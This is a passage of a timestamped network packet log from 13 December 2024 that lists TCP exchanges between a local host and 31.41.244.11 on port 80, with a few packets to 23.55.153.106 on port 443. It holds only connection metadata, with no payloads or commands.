Dec 13, 2024 18:53:45.754102945 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.754137993 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.754179955 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.754815102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.754857063 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.754893064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.754935026 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.755475998 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.755569935 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.755611897 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.756401062 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.757878065 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.891199112 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.891330957 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.891407013 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.891731977 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.891947031 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.892024040 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.892045021 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.892214060 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.892904043 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.892947912 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.893014908 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.893060923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.893903971 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.893949032 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.898380995 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.898438931 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.898464918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.898480892 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.898880959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.898947001 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.898993015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.899925947 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.900043011 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.900105953 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.900897980 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.901207924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.901238918 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.901257038 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.901272058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.901894093 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.901942015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.901962042 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.902003050 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.902810097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.902857065 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.902934074 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.903214931 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.903851032 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.903918028 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.903995037 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.904226065 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.904742002 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.904793024 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.904834032 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.904880047 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.905647993 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.905728102 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.905772924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.905831099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.906605959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.906686068 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.906713009 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.906759024 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.907608986 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.907738924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.907799959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.908643007 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.908759117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.908808947 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.909707069 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.909750938 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.909806967 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.909851074 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.910700083 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.910748005 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.910839081 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.910917997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.911784887 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.911842108 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.911890984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.911935091 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.912782907 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.912828922 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.912916899 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.912961960 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.913819075 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.913865089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.913897991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.913944006 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.914798975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.914938927 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.914993048 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.915815115 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.915877104 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.915956974 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.916857958 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.916887045 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.916935921 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.916955948 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.917006969 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.917876005 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.917927027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.917970896 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.918018103 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.918910980 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.918991089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.919030905 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.919204950 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.919959068 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.920006990 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.920151949 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.920196056 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.920931101 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.920994043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.921039104 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.921081066 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.922044039 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.922142982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.922189951 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.922991037 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.923032999 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.923110008 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.923152924 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.924061060 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.924118996 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.924227953 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.924397945 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.925100088 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.925152063 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.925195932 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.925240040 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.926093102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.926141024 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.926357985 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.926403046 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.927102089 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.927175045 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.927258968 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.927301884 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.928152084 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.928215981 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.928251982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.928345919 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.929152966 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.929286003 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.929328918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.930247068 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.930291891 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.930340052 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.930382967 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.931283951 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.931329966 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.931461096 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.931504011 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.932277918 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.932333946 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.932419062 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.932461977 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.933293104 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.933336973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.933378935 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.933595896 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.934266090 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.934333086 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.934411049 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.934518099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.935266018 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.935317039 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.935394049 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.935437918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.936306000 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.936409950 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.936466932 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.937323093 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.937377930 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.937457085 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.937503099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.938355923 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.938406944 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.938491106 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.938534021 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.939342976 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.939405918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.939452887 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.939506054 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.940402031 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.940445900 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.940480947 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.940522909 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.941497087 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.941543102 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.941586018 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.941632032 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.942466974 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.942512989 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.942662001 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.942708015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.943470955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.943595886 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.943649054 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.944540024 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.944737911 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.944792032 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.945523977 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.945579052 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.945621014 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.945667028 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.946567059 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.946610928 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.946660042 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.946726084 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.947571993 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.947717905 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.947771072 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.948543072 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.948601961 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.009696007 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.009812117 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.011398077 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.011413097 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.011817932 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.013118982 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.059329033 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.089226007 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.089370966 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.089507103 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.089507103 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.089529037 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.089585066 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.089643002 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.089694023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.090673923 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.090724945 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.090764046 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.090812922 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.091675043 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.091743946 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.091770887 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.091821909 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.103400946 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.103456974 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.103457928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.103522062 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.103863001 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.103921890 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.103979111 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.104032993 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.104875088 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.104928017 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.105238914 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.105290890 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.105380058 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.105668068 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.106547117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.106607914 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.106663942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.106766939 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.107331991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.107397079 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.107444048 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.107492924 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.108274937 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.108359098 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.108696938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.108756065 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.108774900 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.108823061 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.109669924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.109761000 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.109774113 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.109875917 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.110871077 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.110928059 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.110986948 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.111040115 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.111685991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.111895084 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.111955881 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.111955881 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.112715960 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.112798929 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.112809896 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.112958908 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.113807917 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.113859892 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.113936901 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.113991976 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.114826918 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.114887953 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.114967108 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.115036964 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.115854979 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.115906954 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.115941048 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.115989923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.116904020 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.116955996 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.117041111 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.117089987 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.117810011 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.117863894 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.117980003 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.118117094 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.118833065 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.118895054 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.118940115 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.118998051 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.119951010 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.120084047 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.120136023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.120946884 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.121026039 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.121071100 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.121120930 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.122056007 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.122193098 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.122246027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.122961998 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.123016119 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.123097897 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.123147964 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.124099970 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.124159098 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.124208927 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.124259949 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.125058889 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.125108004 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.125121117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.125171900 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.126034021 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.126085997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.126202106 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.126256943 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.127392054 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.127445936 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.127614975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.127665997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.128675938 CET	80	49895	31.41.244.11	192.168.2.7
